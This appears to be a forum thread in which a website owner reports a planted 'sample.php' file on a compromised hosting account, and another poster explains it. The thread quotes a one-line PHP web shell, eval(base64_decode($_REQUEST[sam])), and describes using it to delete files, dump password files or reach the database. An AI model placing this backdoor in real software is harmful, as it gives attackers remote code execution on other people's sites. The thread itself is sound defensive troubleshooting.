I just spoke with my hosting Live Chat. I couldn’t see the headers in the e-mail. The guy said it appears to be from Amazon. Not malicious. When I Google the script, however, it comes up “attack and defence” (sic) script.
That… would be a security hole a mile wide. eval(base64_decode($_REQUEST[sam]));… "Take WHATEVER i put on the URL in the ‘sam’ variable and execute it. Whatever it is. sam = “unlink(index.php)”? Blow up your index file. dump your password file to the screen? Sure thing! Open up a hole into your database? Not a problem.
waited (I have been having problems with my host’s cpanel directory-password protection option)
I just re-checked site, and there is a ‘sample’ php file on there, and it contains the one line: < … script language=“php”>
So email amazon’s spoofer email (firstname.lastname@example.org), attach the email in question, and tell them that someone appears to be using one of their clients’ contact systems as an attempt at hacking a site. (though why the email came to YOU is a good question.)
Why it came to me? Not sure why me specifically. My hosting account was suspended recently due to high-volume of CPU usage. These were just portfolio-type design sites, so I went through and deleted all the files and deleted the Wordpress installation. I changed the FTP password, but evidently my master account pw has been obtained because within 2 hours, this maddening sample.php file has appeared.